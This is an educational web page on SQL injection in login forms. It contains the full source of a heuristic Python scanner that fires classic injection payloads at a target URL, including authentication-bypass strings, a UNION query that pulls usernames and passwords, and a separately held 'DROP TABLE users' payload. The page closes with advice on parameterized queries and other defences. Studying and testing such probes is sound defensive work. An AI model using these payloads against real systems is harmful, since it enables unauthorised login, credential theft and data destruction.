What Are SQL Injections?
SQL injection (SQLi) is a vulnerability in web applications that lets an attacker interfere with the queries an application sends to its database, because user input is concatenated into the SQL text instead of being passed as a parameter. This can lead to the theft of sensitive data, authentication bypass, or even full control of the database. Below we explain how SQL injection in a login form is probed and exploited. (For educational purposes only — test only systems you are authorised to assess.)
We have a small heuristic scanner, VulEasy, for you. Its findings are hints that need manual confirmation, not proof of a vulnerability.
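"""VulEasy: a small, heuristic SQL-injection probe for login forms.

The scanner submits a list of classic SQLi payloads through the ``username``
field of a target URL (POST and GET) and reports payloads whose response
looks suspicious: a database error fingerprint in the page, or a response
that arrives noticeably later than a benign baseline request.

Everything it reports is a *hint* that needs manual confirmation; the
heuristics cannot prove injectability, and a clean run does not prove the
target is safe.  Payloads may trigger account lockouts or WAF blocks, so
only run this against systems you are authorised to test.
"""
import platform
import re
import subprocess
import time

import requests
from bs4 import BeautifulSoup

# Non-destructive probe strings sent as the ``username`` value (plus a dummy
# password on POST).  A vulnerable login query may short-circuit (OR 1=1),
# lose its password check (comment markers) or raise a database error.
payload_1 = [
    "' OR '1'='1 --'",
    "'or 1=1 --",
    "'or 1=1 --' LIMIT 1",
    "' OR '1'='1",
    "' OR '1'='1' --",
    "' OR '1'='1' /*",
    "' OR ''='",
    "' UNION SELECT NULL, username, password FROM users --",
    "' OR '1'='1' LIMIT 1 --",
    "'; --",
    "admin' --",
    "' AND '1'='1' --",
    "' AND '1'='2' --",
]

# Mode /2 ("time-based") historically used an identical list.  It is kept
# as a separate copy so the two modes can diverge without touching mode /1.
# NOTE(review): there are currently no delay payloads (SLEEP/WAITFOR) here,
# so mode /2 only differs from /1 in name; detection of delays relies on
# the response-time heuristic in scan_sql_injection().
payload_2 = list(payload_1)

# Stacked-query payloads that DESTROY data on a vulnerable target.  They
# used to be part of both default lists; a scanner must never send these
# without an explicit, deliberate opt-in by the operator.
DESTRUCTIVE_PAYLOADS = [
    "'; DROP TABLE users; --",
]

# Substrings commonly found in verbose database error pages.  Seeing one of
# these in a response is a far stronger SQLi signal than the *absence* of
# the word "error" (the previous heuristic, which flagged almost any page).
SQL_ERROR_SIGNATURES = (
    "sql syntax",
    "syntax error",
    "mysql",
    "mysqli",
    "postgresql",
    "pg_query",
    "sqlite",
    "sqlstate",
    "ora-0",
    "odbc",
    "unclosed quotation mark",
    "quoted string not properly terminated",
    "you have an error in your sql",
)

# URLs scanned so far in this session (see show_history / clear_history).
history = []

# Only http(s) is accepted: ``requests`` cannot fetch other schemes, so the
# old pattern's ``ftp://`` branch only produced a request error later.
_URL_PATTERN = re.compile(r'^https?:\/\/[^\s/$.?#].[^\s]*$', re.IGNORECASE)


def is_valid_url(url):
    """Return True if ``url`` is an absolute http(s) URL without whitespace."""
    return isinstance(url, str) and _URL_PATTERN.match(url) is not None


def detect(input_sequence):
    """Validate a ``[mode, url]`` pair and return a status message.

    Kept for API compatibility; the interactive loop in ``main`` performs the
    same checks inline and does not call this helper.

    Args:
        input_sequence: Sequence expected to hold exactly two strings, the
            mode ("/1" or "/2") and the target URL.

    Returns:
        A "[!] ..." error message when the input is malformed, otherwise
        ``"Mode: <mode>, URL: <url>"``.
    """
    if len(input_sequence) != 2:
        return "[!] Please enter a mode (/1 or /2) followed by a URL."
    mode, url = input_sequence
    if mode not in ['/1', '/2']:
        return "[!] First input must be /1 (Rapid payloads) or /2 (Time-based payloads)."
    if not is_valid_url(url):
        return "[!] The second input must be a valid URL."
    return f"Mode: {mode}, URL: {url}"


def _looks_like_sql_error(text):
    """Return True if ``text`` contains a known database error fingerprint."""
    lowered = text.lower()
    return any(signature in lowered for signature in SQL_ERROR_SIGNATURES)


def _send_probe(url, method, value, *, field, timeout):
    """Send one probe and return ``(response, elapsed_seconds)``.

    POST places ``value`` in ``field`` alongside a dummy password, because
    login forms usually require both; GET places it in the query string.
    ``requests.RequestException`` propagates to the caller.
    """
    started = time.monotonic()
    if method == 'POST':
        response = requests.post(
            url, data={field: value, "password": "password"}, timeout=timeout
        )
    else:
        response = requests.get(url, params={field: value}, timeout=timeout)
    return response, time.monotonic() - started


def scan_sql_injection(url, payloads, *, field="username", timeout=5, delay_threshold=2.0):
    """Probe ``url`` with every payload over POST and GET and print findings.

    A payload is reported when its HTTP 200 response either contains a
    database error fingerprint (``SQL_ERROR_SIGNATURES``) or arrives more
    than ``delay_threshold`` seconds later than a benign baseline request
    made with the same method.  Measuring against a baseline stops a merely
    slow server from looking "time-based vulnerable" on every payload.

    Args:
        url: Target URL (the caller is expected to have validated it).
        payloads: Probe strings sent as the ``field`` value.
        field: Form / query parameter name to inject into.
        timeout: Per-request timeout in seconds.
        delay_threshold: Extra seconds over the baseline that count as a
            suspicious delay.

    Returns:
        The de-duplicated list of payloads flagged for manual validation
        (the same list is printed at the end of the scan).
    """
    flagged = []
    print(f"\n[+] Scanning URL: {url} with {len(payloads)} payloads...\n")

    # One benign request per method gives the timing reference.  If it fails
    # the method falls back to an absolute ``delay_threshold`` (baseline 0).
    baseline_time = {}
    for method in ('POST', 'GET'):
        try:
            _, baseline_time[method] = _send_probe(
                url, method, "vuleasy", field=field, timeout=timeout
            )
        except requests.RequestException as exc:
            print(f"[Error] Baseline {method} request failed - {exc}")

    for payload in payloads:
        for method in ('POST', 'GET'):
            try:
                response, elapsed = _send_probe(
                    url, method, payload, field=field, timeout=timeout
                )
            except requests.RequestException as exc:
                print(f"[Error] Request failed with payload: {payload} - {exc}")
                continue
            if response.status_code != 200:
                continue

            page_text = BeautifulSoup(response.text, 'html.parser').get_text()
            reasons = []
            if _looks_like_sql_error(page_text):
                reasons.append("database error text in response")
            if elapsed - baseline_time.get(method, 0.0) > delay_threshold:
                reasons.append(f"response delayed {elapsed:.1f}s")
            if not reasons:
                continue

            print(f"[Vulnerable] Found with payload: {payload} using {method} "
                  f"({'; '.join(reasons)})")
            if payload not in flagged:
                flagged.append(payload)

    if not flagged:
        print("\n[Secure] No vulnerabilities found "
              "(heuristic scan only; this does not prove the target is safe).")
    else:
        print("\n[!] Manual Validation Recommended for the following payloads:\n")
        for vp in flagged:
            print(f"- {vp}")
    return flagged


def clear_terminal():
    """Clear the console on Windows (``cls``) or POSIX (``clear``)."""
    command = "cls" if platform.system() == "Windows" else "clear"
    # shell=True is acceptable here: the command is a fixed literal chosen
    # above, never user input, and ``cls`` is a cmd.exe builtin that cannot
    # be executed without a shell.
    subprocess.call(command, shell=True)


def show_history():
    """Print the URLs scanned so far, numbered from 1, or a placeholder."""
    if not history:
        print("No URLs in history.")
        return
    print("History of scanned URLs:")
    for position, scanned_url in enumerate(history, start=1):
        print(f"{position}: {scanned_url}")


def clear_history():
    """Forget every URL recorded in ``history``."""
    history.clear()
    print("History cleared.")


def list_commands():
    """Print the interactive commands understood by ``main``."""
    print("/1 - Scan with the rapid payload list (payload_1)")
    print("/2 - Scan with the time-based payload list (payload_2)")
    print("/clear - Clears the terminal")
    print("/history - Shows the scanned-URL history")
    print("/clearhistory - Clears the scanned-URL history")
    print("/list - Shows this list of commands")
    print("/credits - Shows creator name")
    print("/exit - Exit the program")
    print("/quit - Same as /exit")


def credits():
    """Print the author line."""
    print("Developed by @mrduck123 using ChatGPT.\n")


def main():
    """Interactive loop: pick a mode (/1 or /2), then enter a URL to scan it."""
    # Maps a mode command to the payload list it scans with.
    mode_payloads = {'/1': payload_1, '/2': payload_2}
    # Zero-argument commands, dispatched by exact match.
    commands = {
        '/clear': clear_terminal,
        '/history': show_history,
        '/clearhistory': clear_history,
        '/list': list_commands,
        '/credits': credits,
    }
    selected_mode = None

    while True:
        print("## ## ## ## ## ##### ### ### ## ##")
        print("## ## ## ## ## ##### ## ## ## # ####")
        print("## ## ## ## ## #---- ##---## ## ##")
        print("## ## ## ## #### ##### ## ## # ## ##")
        print(" ### ##### #### ##### ## ## ### ##")
        print("/1 for the rapid payload list, /2 for the time-based payload list")
        print("Enter a mode (/1 or /2) followed by a URL to start scanning.\n")
        try:
            user_input = input("Enter URL (/exit or /quit to leave, /list for all commands): ").strip()
        except (EOFError, KeyboardInterrupt):
            # Ctrl-D / Ctrl-C end the session cleanly instead of a traceback.
            print()
            break

        if user_input.lower() in ('/exit', '/quit'):
            break
        if user_input in commands:
            commands[user_input]()
        elif user_input in mode_payloads:
            selected_mode = user_input
            print(f"[+] Mode selected: {selected_mode}. Now enter a valid URL to proceed")
        elif is_valid_url(user_input):
            if selected_mode is None:
                print("[!] Please select a mode first (/1 or /2) before entering a URL")
                continue
            history.append(user_input)
            print(f"[+] URL added to history: {user_input}")
            scan_sql_injection(user_input, mode_payloads[selected_mode])
            # A mode applies to one scan only; the next URL needs a fresh choice.
            selected_mode = None
        else:
            print("[!] Invalid input. Enter a valid command or URL or PLEASE SELECT A MODE FIRST (/1 OR /2)")


if __name__ == "__main__":
    main()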
Login Example
Original Query (the login form builds its SQL by concatenating the submitted username and password straight into the query string):
SELECT * FROM users WHERE username = 'admin' AND password = '1234';
Injected Query:
SELECT * FROM users WHERE username = 'admin' -- ' AND password = '1234';
In this case, the attacker uses the `--` comment marker to cut off the rest of the query, so the `AND password = '1234'` check is never evaluated and the row for `admin` is returned without a valid password. (In MySQL the `--` marker must be followed by a space; `#` and `/* */` are alternative comment syntaxes, which is why the payload list above carries several variants.)
How to Protect Yourself?
- Use prepared statements (parameterized queries) so user input is passed as a bound value and never concatenated into the SQL text; this is the primary fix.
- Validate and sanitize all user inputs as defense in depth — but not as a substitute for parameterization, since blacklists of characters are routinely bypassed.
- Use database accounts with minimal permissions (no DROP/ALTER, no access to unrelated tables) so a successful injection is limited in what it can read or destroy.
- Deploy a web application firewall and monitoring as a secondary layer, and do not return raw database error messages to clients — verbose errors are exactly what error-based injection relies on. These measures slow attackers down but do not fix the underlying flaw.